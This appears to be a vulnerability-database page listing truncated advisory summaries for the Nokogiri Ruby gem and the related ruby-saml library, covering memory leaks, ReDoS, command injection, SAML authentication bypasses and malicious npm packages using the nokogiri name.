Unity Linux 20.1060e / 20.1070e Security Update: rubygem-nokogiri (UTSA-2026-016636)

The Unity Linux 20 host has a package installed that is affected by a vulnerability as referenced in the UTSA-2026-016636 advisory. Nokogiri is a Rubygem providing HTML, XML, SAX, and Reader parsers with XPath and CSS selector support. In Nokogiri v1.12.4 and earlier, on JRuby only, the SAX parse...

Astra Linux - уязвимость в ruby-nokogiri

A command injection vulnerability exists in Nokogiri v1.10.3 and earlier. This vulnerability allows commands to be executed in a subprocess via Ruby’s Kernel.open method. Processes become vulnerable only if the undocumented method Nokogiri::CSS::Tokenizerloadfile is called with unsafe user input ...

Astra Linux - уязвимость в ruby-nokogiri

Nokogiri is an open-source XML and HTML library for Ruby. Nokogiri contains a regular expression that is inefficient and prone to excessive backtracking when attempting to detect encoding in HTML documents. Users are advised to upgrade to Nokogiri = 1.13.4. There are no known solutions or...

GHSA-V2FC-QM4H-8HQV Nokogiri XSLT transform has a memory leak

Summary Nokogiri's Nokogiri::XSLT::Stylesheettransform leaks a small heap allocation when passed a Ruby string parameter containing a null byte. For applications that pass attacker-controlled input through XSLT.transform parameters, this may be a vector for a denial of service attack against...

GHSA-C4RQ-3M3G-8WGX Nokogiri CSS selector tokenizer has regular expression backtracking

Summary Nokogiri's CSS selector tokenizer contains regular expressions whose construction may result in exponential regex backtracking on adversarial selectors. Three ReDoS vectors are addressed in this release: 1. String-literal tokenization on certain unterminated quoted-string input. 2...

PT-2026-38489

Summary Nokogiri's Nokogiri::XSLT::Stylesheettransform leaks a small heap allocation when passed a Ruby string parameter containing a null byte. For applications that pass attacker-controlled input through XSLT.transform parameters, this may be a vector for a denial of service attack against...

Missing Release of Memory after Effective Lifetime

Overview nokogiri is a gem for parsing HTML, XML, SAX, and Reader. Affected versions of this package are vulnerable to Missing Release of Memory after Effective Lifetime in the XSLT::Stylesheettransform function, when a string parameter containing a null byte is processed, preventing...

Nokogiri does not check the return value from xmlC14NExecute

Summary Nokogiri's CRuby extension fails to check the return value from xmlC14NExecute in the method Nokogiri::XML::Documentcanonicalize and Nokogiri::XML::Nodecanonicalize. When canonicalization fails, an empty string is returned instead of raising an exception. This incorrect return value may...

Unchecked Return Value

Overview nokogiri is a gem for parsing HTML, XML, SAX, and Reader. Affected versions of this package are vulnerable to Unchecked Return Value from xmlC14NExecute, used in the canonicalize methods. These return and empty string rather than an error code for invalid and incomplete XML inputs...

GHSA-WX95-C6CV-8532 Nokogiri does not check the return value from xmlC14NExecute

Summary Nokogiri's CRuby extension fails to check the return value from xmlC14NExecute in the method Nokogiri::XML::Documentcanonicalize and Nokogiri::XML::Nodecanonicalize. When canonicalization fails, an empty string is returned instead of raising an exception. This incorrect return value may...

UBUNTU-CVE-2025-66567

The ruby-saml library is for implementing the client side of a SAML authorization. ruby-saml versions up to and including 1.12.4 contain an authentication bypass vulnerability due to an incomplete fix for CVE-2025-25292. ReXML and Nokogiri parse XML differently, generating entirely different...

CVE-2025-66568

The ruby-saml library implements the client side of an SAML authorization. Versions up to and including 1.12.4, are vulnerable to authentication bypass through the libxml2 canonicalization process used by Nokogiri for document transformation, which allows an attacker to execute a Signature Wrappi...

PT-2025-49775

Name of the Vulnerable Software and Affected Versions ruby-saml versions through 1.12.4 Description The ruby-saml library, which handles SAML authorization on the client side, has a flaw that could allow an attacker to bypass authentication. This is due to how the library processes XML data using...

GHSA-9V8J-X534-2FX3 Ruby-saml has a SAML authentication bypass due to namespace handling (parser differential)

Summary Ruby-saml up to and including 1.12.4, there is an authentication bypass vulnerability because of an incomplete fix for CVE-2025-25292. ReXML and Nokogiri parse XML differently, the parsers can generate entirely different document structures from the same XML input. That allows an attacker...

Ruby-saml allows a Libxml2 Canonicalization error to bypass Digest/Signature validation

Summary Ruby-saml up to and including 1.12.4, there is an authentication bypass vulnerability because of an issue at libxml2 canonicalization process used by Nokogiri for document transformation. That allows an attacker to be able to execute a Signature Wrapping attack. The vulnerability does not...

Malicious code in nokogiri (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 52d84f0c9be95071bb514b725ec5c700efe36d5b4ebed67b5e36c3f2cbf6d40e Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MAL-2025-48034 Malicious code in nokogiri (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 52d84f0c9be95071bb514b725ec5c700efe36d5b4ebed67b5e36c3f2cbf6d40e Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

EUVD-2019-0629

Malware in sbrugna...

EUVD-2021-1954

Malware in sbrugna...

EUVD-2025-18911

Malicious code in bioql PyPI...